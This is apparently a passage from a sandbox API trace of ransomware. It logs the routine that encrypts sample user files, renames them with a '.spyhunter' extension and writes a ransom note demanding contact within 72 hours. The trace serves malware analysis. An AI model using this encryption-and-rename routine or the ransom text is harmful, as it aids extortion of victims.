lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eefc*=0x30, lpOverlapped=0x0) returned 1 [0142.731] CloseHandle (hObject=0xac) returned 1 [0142.731] GetProcessHeap () returned 0x2c0000 [0142.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.731] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.spyhunter") returned 60 [0142.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.spyhunter" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.spyhunter")) returned 1 [0142.732] GetProcessHeap () returned 0x2c0000 [0142.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.732] GetProcessHeap () returned 0x2c0000 [0142.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.732] GetProcessHeap () returned 0x2c0000 [0142.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0400 | out: hHeap=0x2c0000) returned 1 [0142.732] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef40 | out: pbBuffer=0x270ef40) returned 1 [0142.732] GetProcessHeap () returned 0x2c0000 [0142.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.732] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef38*=0x30) returned 1 [0142.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0142.733] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0142.733] StrStrW (lpFirst="Penguins.jpg", lpSrch=".txt") returned 0x0 [0142.733] GetProcessHeap () returned 0x2c0000 [0142.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.733] ReadFile (in: hFile=0xac, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eefc*=0x2800, lpOverlapped=0x0) returned 1 [0142.996] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.996] WriteFile (in: hFile=0xac, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eefc*=0x2800, lpOverlapped=0x0) returned 1 [0142.996] GetProcessHeap () returned 0x2c0000 [0142.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.996] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.997] WriteFile (in: hFile=0xac, lpBuffer=0x270ef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x270ef3c*, lpNumberOfBytesWritten=0x270eefc*=0x4, lpOverlapped=0x0) returned 1 [0142.999] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eefc*=0x30, lpOverlapped=0x0) returned 1 [0142.999] CloseHandle (hObject=0xac) returned 1 [0142.999] GetProcessHeap () returned 0x2c0000 [0142.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.999] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.spyhunter") returned 67 [0142.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.spyhunter")) returned 1 [0142.999] GetProcessHeap () returned 0x2c0000 [0143.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.000] GetProcessHeap () returned 0x2c0000 [0143.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.000] GetProcessHeap () returned 0x2c0000 [0143.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe968 | out: hHeap=0x2c0000) returned 1 [0143.000] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef38 | out: pbBuffer=0x270ef38) returned 1 [0143.000] GetProcessHeap () returned 0x2c0000 [0143.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.001] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef30*=0x30) returned 1 [0143.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.003] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0143.003] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".txt") returned 0x0 [0143.003] GetProcessHeap () returned 0x2c0000 [0143.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.003] ReadFile (in: hFile=0xac, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eef4*=0x2800, lpOverlapped=0x0) returned 1 [0143.004] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.004] WriteFile (in: hFile=0xac, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eef4*=0x2800, lpOverlapped=0x0) returned 1 [0143.004] GetProcessHeap () returned 0x2c0000 [0143.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.004] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.005] WriteFile (in: hFile=0xac, lpBuffer=0x270ef34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x270ef34*, lpNumberOfBytesWritten=0x270eef4*=0x4, lpOverlapped=0x0) returned 1 [0143.008] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eef4*=0x30, lpOverlapped=0x0) returned 1 [0143.008] CloseHandle (hObject=0xac) returned 1 [0143.008] GetProcessHeap () returned 0x2c0000 [0143.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.008] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.spyhunter") returned 69 [0143.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.spyhunter")) returned 1 [0143.009] GetProcessHeap () returned 0x2c0000 [0143.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.009] GetProcessHeap () returned 0x2c0000 [0143.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.009] GetProcessHeap () returned 0x2c0000 [0143.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe728 | out: hHeap=0x2c0000) returned 1 [0143.009] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef38 | out: pbBuffer=0x270ef38) returned 1 [0143.009] GetProcessHeap () returned 0x2c0000 [0143.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.009] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef30*=0x30) returned 1 [0143.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.010] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0143.010] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0143.010] GetProcessHeap () returned 0x2c0000 [0143.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0143.010] ReadFile (in: hFile=0xac, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eef4*=0x460, lpOverlapped=0x0) returned 1 [0143.016] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xfffffba0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.016] WriteFile (in: hFile=0xac, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eef4*=0x460, lpOverlapped=0x0) returned 1 [0143.017] GetProcessHeap () returned 0x2c0000 [0143.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0143.017] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.017] WriteFile (in: hFile=0xac, lpBuffer=0x270ef34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x270ef34*, lpNumberOfBytesWritten=0x270eef4*=0x4, lpOverlapped=0x0) returned 1 [0143.017] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eef4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eef4*=0x30, lpOverlapped=0x0) returned 1 [0143.017] CloseHandle (hObject=0xac) returned 1 [0143.017] GetProcessHeap () returned 0x2c0000 [0143.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.017] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.spyhunter") returned 66 [0143.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.spyhunter")) returned 1 [0143.018] GetProcessHeap () returned 0x2c0000 [0143.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.018] GetProcessHeap () returned 0x2c0000 [0143.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.019] GetProcessHeap () returned 0x2c0000 [0143.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe368 | out: hHeap=0x2c0000) returned 1 [0143.019] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef30 | out: pbBuffer=0x270ef30) returned 1 [0143.019] GetProcessHeap () returned 0x2c0000 [0143.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef28*=0x30) returned 1 [0143.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.019] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0143.019] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".txt") returned 0x0 [0143.019] GetProcessHeap () returned 0x2c0000 [0143.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0143.020] ReadFile (in: hFile=0xac, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eeec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eeec*=0x2800, lpOverlapped=0x0) returned 1 [0143.185] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.185] WriteFile (in: hFile=0xac, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eeec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eeec*=0x2800, lpOverlapped=0x0) returned 1 [0143.185] GetProcessHeap () returned 0x2c0000 [0143.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0143.185] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.185] WriteFile (in: hFile=0xac, lpBuffer=0x270ef2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eeec, lpOverlapped=0x0 | out: lpBuffer=0x270ef2c*, lpNumberOfBytesWritten=0x270eeec*=0x4, lpOverlapped=0x0) returned 1 [0143.280] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eeec, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eeec*=0x30, lpOverlapped=0x0) returned 1 [0143.280] CloseHandle (hObject=0xac) returned 1 [0143.280] GetProcessHeap () returned 0x2c0000 [0143.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0143.280] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.spyhunter") returned 72 [0143.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.spyhunter")) returned 1 [0143.281] GetProcessHeap () returned 0x2c0000 [0143.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0143.281] GetProcessHeap () returned 0x2c0000 [0143.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.281] GetProcessHeap () returned 0x2c0000 [0143.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030c40 | out: hHeap=0x2c0000) returned 1 [0143.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef30 | out: pbBuffer=0x270ef30) returned 1 [0143.281] GetProcessHeap () returned 0x2c0000 [0143.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.281] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef28*=0x30) returned 1 [0143.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.491] GetProcessHeap () returned 0x2c0000 [0143.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.491] GetProcessHeap () returned 0x2c0000 [0143.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f367c0 | out: hHeap=0x2c0000) returned 1 [0143.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef28 | out: pbBuffer=0x270ef28) returned 1 [0143.491] GetProcessHeap () returned 0x2c0000 [0143.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef20*=0x30) returned 1 [0143.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.492] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0143.492] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0143.492] GetProcessHeap () returned 0x2c0000 [0143.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.492] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eee4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eee4*=0x192, lpOverlapped=0x0) returned 1 [0143.493] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.493] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x270eee4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eee4*=0x192, lpOverlapped=0x0) returned 1 [0143.493] GetProcessHeap () returned 0x2c0000 [0143.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.493] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.493] WriteFile (in: hFile=0xac, lpBuffer=0x270ef24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eee4, lpOverlapped=0x0 | out: lpBuffer=0x270ef24*, lpNumberOfBytesWritten=0x270eee4*=0x4, lpOverlapped=0x0) returned 1 [0143.493] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eee4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eee4*=0x30, lpOverlapped=0x0) returned 1 [0143.493] CloseHandle (hObject=0xac) returned 1 [0143.494] GetProcessHeap () returned 0x2c0000 [0143.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.494] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.spyhunter") returned 52 [0143.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\favorites\\desktop.ini.spyhunter")) returned 1 [0143.494] GetProcessHeap () returned 0x2c0000 [0143.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.494] GetProcessHeap () returned 0x2c0000 [0143.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.494] GetProcessHeap () returned 0x2c0000 [0143.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b128 | out: hHeap=0x2c0000) returned 1 [0143.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef28 | out: pbBuffer=0x270ef28) returned 1 [0143.495] GetProcessHeap () returned 0x2c0000 [0143.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef20*=0x30) returned 1 [0143.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.495] GetProcessHeap () returned 0x2c0000 [0143.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.495] GetProcessHeap () returned 0x2c0000 [0143.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e6e8 | out: hHeap=0x2c0000) returned 1 [0143.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef20 | out: pbBuffer=0x270ef20) returned 1 [0143.495] GetProcessHeap () returned 0x2c0000 [0143.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef18*=0x30) returned 1 [0143.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\." (normalized: "c:\\users\\default\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.495] GetProcessHeap () returned 0x2c0000 [0143.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.496] GetProcessHeap () returned 0x2c0000 [0143.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e418 | out: hHeap=0x2c0000) returned 1 [0143.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.496] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.496] WriteFile (in: hFile=0xac, lpBuffer=0x270ee53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x270ee53*, lpNumberOfBytesWritten=0x270ef7c*=0x127, lpOverlapped=0x0) returned 1 [0143.497] lstrlenA 